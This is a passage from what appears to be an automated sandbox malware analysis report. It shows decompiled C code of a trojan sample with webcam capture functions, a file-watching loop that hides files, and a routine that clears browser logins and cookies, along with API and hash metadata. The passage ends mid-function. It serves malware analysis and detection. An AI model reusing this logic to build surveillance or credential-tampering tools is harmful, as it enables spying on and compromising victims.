                    					if( *_t145 < 0) {
                    						goto L10;
                    					}
                    				}
                    				_t64 = 7;
                    				__eflags =  *(_t145 + 4) - _t64;
                    				if(__eflags >= 0) {
                    					if(__eflags > 0) {
                    						goto L10;
                    					}
                    					__eflags =  *_t145 - 0x93406fff;
                    					if(__eflags > 0) {
                    						goto L10;
                    					}
                    				}
                    				E00447E20(0, _t145, _t155, __eflags);
                    				_v12 = 0;
                    				_v16 = 0;
                    				_v8 = 0;
                    				_t67 = E00447655( &_v12);
                    				_pop(_t125);
                    				__eflags = _t67;
                    				if(_t67 == 0) {
                    					_t75 = E00447681( &_v16);
                    					_pop(_t125);
                    					__eflags = _t75;
                    					if(_t75 == 0) {
                    						_t77 = E004476AD( &_v8);
                    						_pop(_t125);
                    						__eflags = _t77;
                    						if(_t77 == 0) {
                    							_t118 =  *(_t145 + 4);
                    							_t128 =  *_t145;
                    							__eflags = _t118;
                    							if(__eflags < 0) {
                    								L28:
                    								_push(_t145);
                    								_push(_t155);
                    								_t78 = E00441327();
                    								__eflags = _t78;
                    								if(_t78 != 0) {
                    									goto L11;
                    								}
                    								__eflags = _v12;
                    								asm("cdq");
                    								_t147 =  *_t155;
                    								_t120 = _t139;
                    								if(__eflags == 0) {
                    									L32:
                    									_t80 = _v8;
                    									L33:
                    									asm("cdq");
                    									_t148 = _t147 - _t80;
                    									asm("sbb ebx, edx");
                    									_t81 = E00455EF0(_t148, _t120, 0x3c, 0);
                    									 *_t155 = _t81;
                    									__eflags = _t81;
                    									if(_t81 < 0) {
                    										_t148 = _t148 + 0xffffffc4;
                    										 *_t155 = _t81 + 0x3c;
                    										asm("adc ebx, 0xffffffff");
                    									}
                    									_t82 = E00455E40(_t148, _t120, 0x3c, 0);
                    									_t121 = _t139;
                    									_t28 = _t155 + 4; // 0x848d0046
                    									asm("cdq");
                    									_t150 = _t82 +  *_t28;
                    									asm("adc ebx, edx");
                    									_t84 = E00455EF0(_t150, _t139, 0x3c, 0);
                    									 *(_t155 + 4) = _t84;
                    									__eflags = _t84;
                    									if(_t84 < 0) {
                    										_t150 = _t150 + 0xffffffc4;
                    										 *(_t155 + 4) = _t84 + 0x3c;
                    										asm("adc ebx, 0xffffffff");
                    									}
                    									_t85 = E00455E40(_t150, _t121, 0x3c, 0);
                    									_t122 = _t139;
                    									_t31 = _t155 + 8; // 0xa824
                    									asm("cdq");
                    									_t152 = _t85 +  *_t31;
                    									asm("adc ebx, edx");
                    									_t87 = E00455EF0(_t152, _t139, 0x18, 0);
                    									 *(_t155 + 8) = _t87;
                    									__eflags = _t87;
                    									if(_t87 < 0) {
                    										_t152 = _t152 + 0xffffffe8;
                    										 *(_t155 + 8) = _t87 + 0x18;
                    										asm("adc ebx, 0xffffffff");
                    									}
                    									_t131 = E00455E40(_t152, _t122, 0x18, 0);
                    									__eflags = _t139;
                    									if(__eflags < 0) {
                    										L48:
                    										_t44 = _t155 + 0x18; // 0xa024848d
                    										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
                    										asm("cdq");
                    										_t153 = 7;
                    										_t51 = _t155 + 0xc; // 0x50506a00
                    										_t93 =  *_t51;
                    										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
                    										__eflags = _t93;
                    										if(_t93 > 0) {
                    											goto L43;
                    										}
                    										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
                    										 *(_t155 + 0xc) = _t93 + 0x1f;
                    										_t55 = _t131 + 0x16d; // 0x16d
                    										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
                    										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
                    										goto L44;
                    									} else {
                    										if(__eflags > 0) {
                    											L42:
                    											_t34 = _t155 + 0x18; // 0xa024848d
                    											asm("cdq");
                    											_t154 = 7;
                    											_t39 = _t155 + 0xc;
                    											 *_t39 =  *(_t155 + 0xc) + _t131;
                    											__eflags =  *_t39;
                    											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
                    											L43:
                    											_t42 = _t155 + 0x1c;
                    											 *_t42 =  *(_t155 + 0x1c) + _t131;
                    											__eflags =  *_t42;
                    											L44:
                    											_t78 = 0;
                    											goto L11;
                    										}
                    										__eflags = _t131;
                    										if(_t131 == 0) {
                    											__eflags = _t139;
                    											if(__eflags > 0) {
                    												goto L44;
                    											}
                    											if(__eflags < 0) {
                    												goto L48;
                    											}
                    											__eflags = _t131;
                    											if(_t131 >= 0) {
                    												goto L44;
                    											}
                    											goto L48;
                    										}
                    										goto L42;
                    									}
                    								}
                    								_push(_t155);
                    								_t102 = E00447E71(_t120, _t147, _t155, __eflags);
                    								__eflags = _t102;
                    								if(_t102 == 0) {
                    									goto L32;
                    								}
                    								_t80 = _v8 + _v16;
                    								 *((intOrPtr*)(_t155 + 0x20)) = 1;
                    								goto L33;
                    							}
                    							if(__eflags > 0) {
                    								L20:
                    								_t104 = 7;
                    								__eflags = _t118 - _t104;
                    								if(__eflags > 0) {
                    									goto L28;
                    								}
                    								if(__eflags < 0) {
                    									L23:
                    									asm("cdq");
                    									_push( &_v24);
                    									asm("sbb ebx, edx");
                    									_v24 = _t128 - _v8;
                    									_push(_t155);
                    									_v20 = _t118;
                    									_t78 = E00441327();
                    									__eflags = _t78;
                    									if(_t78 != 0) {
                    										goto L11;
                    									}
                    									__eflags = _v12 - _t78;
                    									if(__eflags == 0) {
                    										goto L44;
                    									}
                    									_push(_t155);
                    									_t107 = E00447E71(_t118, _t145, _t155, __eflags);
                    									__eflags = _t107;
                    									if(_t107 == 0) {
                    										goto L44;
                    									}
                    									asm("cdq");
                    									_v24 = _v24 - _v16;
                    									_push( &_v24);
                    									asm("sbb [ebp-0x10], edx");
                    									_push(_t155);
                    									_t78 = E00441327();
                    									__eflags = _t78;
                    									if(_t78 != 0) {
                    										goto L11;
                    									}
                    									 *((intOrPtr*)(_t155 + 0x20)) = 1;
                    									goto L44;
                    								}
                    								__eflags = _t128 - 0x933c7b7f;
                    								if(_t128 >= 0x933c7b7f) {
                    									goto L28;
                    								}
                    								goto L23;
                    							}
                    							__eflags = _t128 - 0x3f480;
                    							if(_t128 <= 0x3f480) {
                    								goto L28;
                    							}
                    							goto L20;
                    						}
                    					}
                    				}
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				E0043A5E8();
                    				asm("int3");
                    				_push(_t155);
                    				_t69 = E004412C2(_t125);
                    				_t156 = _t69;
                    				__eflags = _t156;
                    				if(_t156 != 0) {
                    					_push(_v0);
                    					_t70 = E004393DC(0, _t139, _t145, _t156);
                    					asm("sbb eax, eax");
                    					_t73 =  !( ~_t70) & _t156;
                    					__eflags = _t73;
                    					return _t73;
                    				}
                    				return _t69;
                    			}

                    APIs
                    • __allrem.LIBCMT ref: 00439569
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00439585
                    • __allrem.LIBCMT ref: 0043959C
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004395BA
                    • __allrem.LIBCMT ref: 004395D1
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004395EF
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 1992179935-0
                    • Opcode ID: 1dddf8e515139d97c6967afe93bbf2e1bd56be1d0b4091d9d2e71436e447a3a3
                    • Instruction ID: e4b6510059702768e302587ffc0a9b2f327eb02b25cf372d85322d71f2147457
                    • Opcode Fuzzy Hash: 1dddf8e515139d97c6967afe93bbf2e1bd56be1d0b4091d9d2e71436e447a3a3
                    • Instruction Fuzzy Hash: BE815B72600B02ABE7249F79CC42B6B73A9AF58328F24552FF411D7381E7B8DD418B58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E00404351(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, char** _a4, signed int _a8, intOrPtr _a12) {
                    				char _v4;
                    				void* _v36;
                    				char _v40;
                    				char _v48;
                    				char _v52;
                    				char _v56;
                    				char _v72;
                    				void* __esi;
                    				void* _t24;
                    				char** _t26;
                    				intOrPtr* _t28;
                    				char* _t36;
                    				intOrPtr _t46;
                    				signed int _t55;
                    				signed int _t57;
                    				char* _t60;
                    				void* _t63;
                    				signed int _t64;
                    				void* _t66;
                    				signed int _t75;
                    				void* _t78;
                    				void* _t127;
                    				signed int _t129;
                    				signed int _t131;
                    				signed int _t133;
                    				signed int _t134;
                    				signed int _t135;
                    				signed int _t136;
                    				void* _t139;
                    				signed int _t140;
                    				char* _t142;
                    				signed int _t144;
                    				void* _t147;
                    				void* _t148;
                    				intOrPtr* _t149;
                    
                    				_push(__edi);
                    				_t122 = _a8;
                    				_t127 = __ecx;
                    				_t24 = E0040278C(__ecx, _a8);
                    				_t78 = _t127;
                    				_t156 = _t24;
                    				if(_t24 == 0) {
                    					_push(__ebx);
                    					E00402868(_t78, __edx, _t139, 0);
                    					_t26 = E0040221D();
                    					_t75 = _a8;
                    					_a4 = _t26;
                    					_t117 =  *_t26;
                    					__eflags =  !_t117 - _t75;
                    					if( !_t117 <= _t75) {
                    						E00402884(_t127, _t139);
                    						asm("int3");
                    						_t140 = _t144;
                    						_push(_t127);
                    						_t28 = E00401F8B( &_v4);
                    						E00404182( &_v4,  &_v40, 4, 0xffffffff);
                    						_t147 = (_t144 & 0xfffffff8) - 0xc;
                    						E004020D6(_t75, _t147, _t117, __eflags, 0x472ec8);
                    						_t148 = _t147 - 0x18;
                    						E004020D6(_t75, _t148, _t117, __eflags,  &_v56);
                    						E0041A976( &_v72, _t117);
                    						_t149 = _t148 + 0x30;
                    						_t129 =  *_t28 - 0x3c;
                    						__eflags = _t129;
                    						if(__eflags == 0) {
                    							E00401E45( &_v48, _t117, _t140, __eflags, 0);
                    							_t36 = E0040245C();
                    							E00401F8B(E00401E45( &_v52, _t117, _t140, __eflags, 0));
                    							_t117 = _t36;
                    							_t131 = E00411235();
                    							__eflags = _t131;
                    							if(_t131 != 0) {
                    								 *0x470ad4 = E004114AA(_t131, "OpenCamera");
                    								 *0x470ad0 = E004114AA(_t131, "CloseCamera");
                    								_t46 = E004114AA(_t131, "GetFrame");
                    								_t117 = "FreeFrame";
                    								 *0x470ad8 = _t46;
                    								 *0x470acc = E004114AA(_t131, "FreeFrame");
                    								 *0x470aba = 1;
                    								E004020D6(_t75, _t149 - 0x18, "FreeFrame", __eflags, 0x472e30);
                    								_push(0x1b);
                    								goto L23;
                    							}
                    						} else {
                    							_t133 = _t129 - 1;
                    							__eflags = _t133;
                    							if(_t133 == 0) {
                    								__eflags =  *0x470a87;
                    								if(__eflags != 0) {
                    									goto L20;
                    								}
                    							} else {
                    								_t134 = _t133 - 1;
                    								__eflags = _t134;
                    								if(_t134 == 0) {
                    									 *0x470ad0();
                    									 *0x470a87 = 0;
                    								} else {
                    									_t135 = _t134 - 1;
                    									__eflags = _t135;
                    									if(_t135 == 0) {
                    										_t55 =  *0x470ad4();
                    										 *0x470a87 = _t55;
                    										__eflags = _t55;
                    										if(__eflags == 0) {
                    											goto L15;
                    										} else {
                    											L20:
                    											_t117 = E0043A3AC(_t50, E00401F8B(E00401E45( &_v48, _t117, _t140, __eflags, 0)));
                    											E004045E7(_a8, _t52, __eflags);
                    										}
                    									} else {
                    										_t136 = _t135 - 1;
                    										__eflags = _t136;
                    										if(_t136 == 0) {
                    											_t57 =  *0x470ad4();
                    											 *0x470a87 = _t57;
                    											__eflags = _t57;
                    											if(__eflags == 0) {
                    												L15:
                    												E004020D6(_t75, _t149 - 0x18, _t117, __eflags, 0x472e30);
                    												_push(0x41);
                    												L23:
                    												E00404A81(_a8, _t117, __eflags);
                    											} else {
                    												_t60 = E0043A3AC(_t58, E00401F8B(E00401E45( &_v48, _t117, _t140, __eflags, _t136)));
                    												 *_t149 = 0x3e8;
                    												Sleep(??);
                    												_t117 = _t60;
                    												E004045E7(_a8, _t60, __eflags);
                    												 *0x470ad0();
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    						_t21 =  &_v48; // 0x472e30
                    						E00401E6D(_t21, _t117);
                    						E00401FB8();
                    						E00401FB8();
                    						__eflags = 0;
                    						return 0;
                    					} else {
                    						_push(_t139);
                    						_t142 =  &(_t117[_t75]);
                    						__eflags = _t75;
                    						if(_t75 != 0) {
                    							_t64 = E004027C6(_t75, _t127, _t117, _t122, _t142, 0);
                    							__eflags = _t64;
                    							if(_t64 != 0) {
                    								_t66 = E0040220A(_t127);
                    								E004015A6(E0040220A(_t127) + _t75 * 2, _t66,  *_a8);
                    								E00401592(E0040220A(_t127), _t122, _t75);
                    								E00402837(_t142);
                    							}
                    						}
                    						_t63 = _t127;
                    						goto L7;
                    					}
                    				} else {
                    					_push(_a12);
                    					_t63 = E004034C6(__ebx, _t127, __edx, _t122 - E0040220A(_t78) >> 1, _t127, _t139, _t156, _t78, _t127, _t122 - E0040220A(_t78) >> 1);
                    					L7:
                    					return _t63;
                    				}
                    			}

                    APIs
                      • Part of subcall function 00402884: std::_Xinvalid_argument.LIBCPMT ref: 00402889
                    • Sleep.KERNEL32(00000000,00409ABF), ref: 004044A4
                      • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prologSleepXinvalid_argumentstd::_
                    • String ID: 0.G$CloseCamera$FreeFrame$GetFrame$OpenCamera
                    • API String ID: 834325642-106669708
                    • Opcode ID: 500cdb838e30def03354b7fb84f69d778f12aaaac4c335bfd6e04aeec570f5d0
                    • Instruction ID: ecedd063232be1ac5acd44a52b85944b2f12cafd62aea4fc44177e9967f66efd
                    • Opcode Fuzzy Hash: 500cdb838e30def03354b7fb84f69d778f12aaaac4c335bfd6e04aeec570f5d0
                    • Instruction Fuzzy Hash: 6E51E571A04300ABC614FB769D5AA6E37959BD0714F00453FFA0A772E2DF7C8A45839E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E004441FA(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				char _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				char* _v44;
                    				char _v48;
                    				void* __ecx;
                    				signed int _t67;
                    				signed int _t70;
                    				signed int _t71;
                    				signed int _t75;
                    				intOrPtr _t76;
                    				signed int _t79;
                    				signed int _t86;
                    				intOrPtr _t88;
                    				signed int _t99;
                    				void* _t101;
                    				void* _t103;
                    				void* _t108;
                    				signed int _t112;
                    				signed int _t113;
                    				signed int _t116;
                    				signed int _t123;
                    				signed int _t125;
                    				intOrPtr _t126;
                    				signed int _t128;
                    				intOrPtr _t130;
                    				signed int _t131;
                    				void* _t135;
                    				void* _t136;
                    				void* _t138;
                    
                    				_t120 = __edx;
                    				_t97 = __ebx;
                    				_push(_t101);
                    				if(_a8 != 0) {
                    					_push(__esi);
                    					_push(__edi);
                    					_t123 = 0;
                    					_t67 = E0043F7BD( &_v8, 0, 0, _a8, 0x7fffffff);
                    					_t136 = _t135 + 0x14;
                    					__eflags = _t67;
                    					if(_t67 == 0) {
                    						L5:
                    						_t128 = E004443F4(_t101, _v8, 2);
                    						_pop(_t103);
                    						__eflags = _t128;
                    						if(_t128 == 0) {
                    							L11:
                    							E00445002(_t128);
                    							_t70 = _t123;
                    							goto L12;
                    						} else {
                    							_t71 = E0043F7BD(_t123, _t128, _v8, _a8, 0xffffffff);
                    							_t136 = _t136 + 0x14;
                    							__eflags = _t71;
                    							if(_t71 == 0) {
                    								_t123 = E0044357C(_t97, _t103, _t120, _a4, _t128);
                    								goto L11;
                    							} else {
                    								__eflags = _t71 - 0x16;
                    								if(_t71 == 0x16) {
                    									goto L13;
                    								} else {
                    									__eflags = _t71 - 0x22;
                    									if(_t71 != 0x22) {
                    										goto L11;
                    									} else {
                    										goto L13;
                    									}
                    								}
                    							}
                    						}
                    					} else {
                    						__eflags = _t67 - 0x16;
                    						if(_t67 == 0x16) {
                    							L13:
                    							_push(_t123);
                    							_push(_t123);
                    							_push(_t123);
                    							_push(_t123);
                    							E0043A5E8();
                    							asm("int3");
                    							E00433700(0x46c970, 0x1c);
                    							_t130 = _a4;
                    							_t75 = E004441FA(_t97, _t120, _t123, _t130, _t130, _a8);
                    							_t108 = _t123;
                    							_t125 = _t75;
                    							__eflags = _t125;
                    							if(_t125 != 0) {
                    								_t76 = E00446A95(_t97, _t108, _t120);
                    								_v40 = _t76;
                    								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
                    								_t110 =  *((intOrPtr*)(_t76 + 0x48));
                    								_v44 =  *((intOrPtr*)(_t76 + 0x48));
                    								_v32 = 0;
                    								_t79 = E0043FEEB( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
                    								_t138 = _t136 + 0x18;
                    								__eflags = _t79;
                    								if(_t79 == 0) {
                    									L22:
                    									_t99 = E00444A38(_t110, _v32 + 4);
                    									__eflags = _t99;
                    									if(_t99 == 0) {
                    										goto L15;
                    									} else {
                    										_t20 = _t99 + 4; // 0x4
                    										_v36 = _t20;
                    										_t110 =  &_v48;
                    										_t125 = 0;
                    										_t86 = E0043FEEB( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
                    										_t138 = _t138 + 0x18;
                    										__eflags = _t86;
                    										if(_t86 == 0) {
                    											L29:
                    											_t126 = _v48;
                    											E00444189(4);
                    											_pop(_t112);
                    											_v8 = _v8 & 0x00000000;
                    											_t131 = _t130 + _t130;
                    											_t113 = _t112 | 0xffffffff;
                    											__eflags =  *(_t126 + 0x24 + _t131 * 8);
                    											if(__eflags != 0) {
                    												asm("lock xadd [edx], eax");
                    												if(__eflags == 0) {
                    													E00445002( *(_t126 + 0x24 + _t131 * 8));
                    													_pop(_t116);
                    													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                    													_t113 = _t116 | 0xffffffff;
                    													__eflags = _t113;
                    												}
                    											}
                    											_t88 = _v40;
                    											__eflags =  *(_t88 + 0x350) & 0x00000002;
                    											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
                    												__eflags =  *0x46f9a4 & 0x00000001;
                    												if(( *0x46f9a4 & 0x00000001) == 0) {
                    													__eflags =  *(_t126 + 0x24 + _t131 * 8);
                    													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
                    														asm("lock xadd [eax], ecx");
                    														__eflags = _t113 == 1;
                    														if(_t113 == 1) {
                    															E00445002( *(_t126 + 0x24 + _t131 * 8));
                    															_t51 = _t126 + 0x24 + _t131 * 8;
                    															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                    															__eflags =  *_t51;
                    														}
                    													}
                    												}
                    											}
                    											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
                    											 *(_t126 + 0x24 + _t131 * 8) = _t99;
                    											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
                    											_v8 = 0xfffffffe;
                    											E004443EB();
                    										} else {
                    											__eflags = _t86 - 0x16;
                    											if(_t86 == 0x16) {
                    												L26:
                    												_push(_t125);
                    												_push(_t125);
                    												_push(_t125);
                    												_push(_t125);
                    												_push(_t125);
                    												goto L20;
                    											} else {
                    												__eflags = _t86 - 0x22;
                    												if(_t86 != 0x22) {
                    													__eflags = _t86;
                    													if(_t86 == 0) {
                    														goto L29;
                    													} else {
                    														E00445002(_t99);
                    														goto L15;
                    													}
                    												} else {
                    													goto L26;
                    												}
                    											}
                    										}
                    									}
                    								} else {
                    									__eflags = _t79 - 0x16;
                    									if(_t79 == 0x16) {
                    										L19:
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										L20:
                    										_t79 = E0043A5E8();
                    									} else {
                    										__eflags = _t79 - 0x22;
                    										if(_t79 == 0x22) {
                    											goto L19;
                    										}
                    									}
                    									__eflags = _t79;
                    									if(_t79 != 0) {
                    										goto L15;
                    									} else {
                    										goto L22;
                    									}
                    								}
                    							} else {
                    								L15:
                    							}
                    							return E00433746();
                    						} else {
                    							__eflags = _t67 - 0x22;
                    							if(_t67 == 0x22) {
                    								goto L13;
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    				} else {
                    					_t70 = E0044357C(__ebx, _t101, __edx, _a4, 0);
                    					L12:
                    					return _t70;
                    				}
                    			}


                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: __cftoe
                    • String ID:
                    • API String ID: 4189289331-0
                    • Opcode ID: 1e01b658f374c474e9f8643c5383819788eb159efaecc8c22926f80f8221aa00
                    • Instruction ID: 8fe28a21c22037a225050a123006aa5e814484bf9f3f78946cda57ab9d9a3774
                    • Opcode Fuzzy Hash: 1e01b658f374c474e9f8643c5383819788eb159efaecc8c22926f80f8221aa00
                    • Instruction Fuzzy Hash: 2451EE72900505A7FF249F99CC42FAF77A8AF89774F20425FF81496292DB3DD900866C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E00409C99(void* __ecx, char* __edx) {
                    				char _v1028;
                    				char _v1040;
                    				char _v1064;
                    				char _v1076;
                    				void* _v1088;
                    				void* _v1092;
                    				char _v1100;
                    				char _v1124;
                    				void* _v1132;
                    				char _v1136;
                    				void* _v1148;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				signed char _t32;
                    				char* _t34;
                    				void* _t36;
                    				int _t40;
                    				void* _t47;
                    				int _t62;
                    				void* _t64;
                    				void* _t70;
                    				void* _t71;
                    				void* _t79;
                    				void* _t134;
                    				signed int _t136;
                    				signed int _t139;
                    
                    				_t126 = __edx;
                    				_t139 = _t136 & 0xfffffff8;
                    				_t79 = __ecx;
                    				_push(_t130);
                    				_t134 = __ecx + 4;
                    				do {
                    					Sleep(0x1388);
                    					E00409BE8(_t79, _t126);
                    					_t126 = 0x46a8f0;
                    					if(E00406E2B(_t139) != 0) {
                    						if(E0040619C() == 0) {
                    							CreateDirectoryW(E00401EE4(0x4730b8), 0);
                    						}
                    						_t128 = _t79 + 0x60;
                    						_t32 = GetFileAttributesW(E00401EE4(_t79 + 0x60));
                    						_t142 = _t32 & 0x00000002;
                    						if((_t32 & 0x00000002) != 0) {
                    							SetFileAttributesW(E00401EE4(_t128), 0x80);
                    						}
                    						_t34 = E00401F8B(E00401E45(0x473298, _t126, _t134, _t142, 0x12));
                    						_t143 =  *_t34;
                    						if( *_t34 != 0) {
                    							E004020BF(_t79,  &_v1124);
                    							_t36 = E0040245C();
                    							E0040632B( &_v1028, E00401F8B(0x473280), _t36);
                    							_t40 = PathFileExistsW(E00401EE4(_t128));
                    							__eflags = _t40;
                    							if(_t40 != 0) {
                    								E004020BF(_t79,  &_v1100);
                    								E00401EE4(_t128);
                    								_t126 =  &_v1100;
                    								_t62 = E0041ADFE( &_v1100);
                    								__eflags = _t62;
                    								if(_t62 != 0) {
                    									_t64 = E0040245C();
                    									E00401FC2( &_v1136,  &_v1100, _t130, E0040644C(_t79,  &_v1028,  &_v1100,  &_v1076, E00401F8B( &_v1100), _t64));
                    									E00401FB8();
                    								}
                    								E00401FB8();
                    							}
                    							__eflags = E0040245C() + _t41;
                    							L00403356(E00402097(_t79,  &_v1076, _t126, _t134, __eflags, E00401EE4(_t134), E0040245C() + _t41));
                    							E00401FB8();
                    							_t47 = E0040245C();
                    							E0040644C(_t79,  &_v1040, _t126,  &_v1064, E00401F8B( &_v1136), _t47);
                    							_t126 = E00401EE4(_t128);
                    							E0041AE6B( &_v1076, _t51);
                    							E00401FB8();
                    							E00401FB8();
                    						} else {
                    							_t70 = E00401EE4(_t128);
                    							_t71 = E0040245C();
                    							_t132 = _t71;
                    							_t130 = _t71 + _t132;
                    							E00401EE4(_t134);
                    							_t126 = _t71 + _t132;
                    							E0041AD6A(_t71 + _t132, _t70, 1);
                    						}
                    						L004086CB(_t79, _t134, _t126, 0x46a8f0);
                    						if( *((char*)(E00401F8B(E00401E45(0x473298, _t126, _t134, _t143, 0x13)))) != 0) {
                    							SetFileAttributesW(E00401EE4(_t128), 6);
                    						}
                    					}
                    				} while ( *((char*)(_t79 + 0x49)) != 0);
                    				return 0;
                    			}


                    APIs
                    • Sleep.KERNEL32(00001388), ref: 00409CB3
                      • Part of subcall function 00409BE8: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409CC0), ref: 00409C1E
                      • Part of subcall function 00409BE8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409CC0), ref: 00409C2D
                      • Part of subcall function 00409BE8: Sleep.KERNEL32(00002710,?,?,?,00409CC0), ref: 00409C5A
                      • Part of subcall function 00409BE8: CloseHandle.KERNEL32(00000000,?,?,?,00409CC0), ref: 00409C61
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409CEF
                    • GetFileAttributesW.KERNEL32(00000000), ref: 00409D00
                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409D17
                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409D91
                      • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0046A8F0,?,00000000,00000000,00000000,00000000,00000000), ref: 00409E9A
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                    • String ID:
                    • API String ID: 3795512280-0
                    • Opcode ID: 59506a914bbfcea490ed3023c6497aacaf04dca16843856057a0f918d3296b1b
                    • Instruction ID: a26b43d943647d041280ad137afe2d2b6888429955654135db8bde193f98b3d7
                    • Opcode Fuzzy Hash: 59506a914bbfcea490ed3023c6497aacaf04dca16843856057a0f918d3296b1b
                    • Instruction Fuzzy Hash: 35514D312043015BC714BB72D8A6ABF779A9F80308F04453FB946B72E3DE7D9D05869A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E0040B586(void* __edi) {
                    				char _v5;
                    				char _v6;
                    				char _v7;
                    				void* __ebx;
                    				void* __ecx;
                    				void* __ebp;
                    				intOrPtr _t18;
                    				void* _t36;
                    				intOrPtr _t40;
                    				char _t50;
                    				void* _t52;
                    				void* _t53;
                    				signed int _t54;
                    				signed int _t55;
                    				void* _t56;
                    
                    				_t52 = __edi;
                    				_t55 = _t54 & 0xfffffff8;
                    				 *0x470b1a = 1;
                    				Sleep( *0x470b28);
                    				_v7 = 0;
                    				_t36 = 0;
                    				_v6 = 0;
                    				_v5 = 0;
                    				goto L1;
                    				do {
                    					do {
                    						L1:
                    						_t60 = _t36;
                    						if(_t36 == 0) {
                    							L2:
                    							_t36 = E0040B463(_t60);
                    						}
                    						_t61 = _t36;
                    						if(_t36 == 0) {
                    							_t36 = E0040B2B1(_t50, _t52, _t61);
                    						}
                    						_t62 = _v6;
                    						if(_v6 == 0) {
                    							_v6 = E0040B0AA(_t36, _t50, _t52, _t62);
                    						}
                    						_t63 = _v7;
                    						if(_v7 == 0) {
                    							_v7 = E0040B01B(_t50, _t52, _t63);
                    						}
                    						_t50 = _v5;
                    						_t64 = _t50;
                    						if(_t50 == 0) {
                    							_t50 = E0040AF8C(_t50, _t52, _t64);
                    							_v5 = _t50;
                    						}
                    						if(_t36 == 0 || _t36 == 0) {
                    							L16:
                    							Sleep(0x1388);
                    							_t18 = _v7;
                    							_t40 = _v6;
                    							_t50 = _v5;
                    						} else {
                    							_t18 = _v7;
                    							if(_t18 == 0 || _t50 == 0) {
                    								goto L16;
                    							} else {
                    								_t40 = _v6;
                    								if(_t40 == 0) {
                    									goto L16;
                    								}
                    							}
                    						}
                    						if(_t36 == 0) {
                    							goto L2;
                    						}
                    					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
                    					_t74 = _t40;
                    				} while (_t40 == 0);
                    				_t56 = _t55 - 0x18;
                    				E00402073(_t36, _t56, _t50, _t53, "\n[Cleared browsers logins and cookies.]\n");
                    				E0040B752(_t36, _t50, _t53, _t74);
                    				E00402073(_t36, _t56, _t50, _t53, "Cleared browsers logins and cookies.");
                    				_t57 = _t56 - 0x18;
                    				E00402073(_t36, _t56 - 0x18, _t50, _t53, "i");
                    				E0041A04A(_t36, _t52);
                    				E00402073(_t36, _t57 + 0x18, _t50, _t53, 0x464074);
                    				_push(0xaf);
                    				E00404A81(0x4734e8, _t50, _t74);
                    				if( *0x470b19 != 0) {
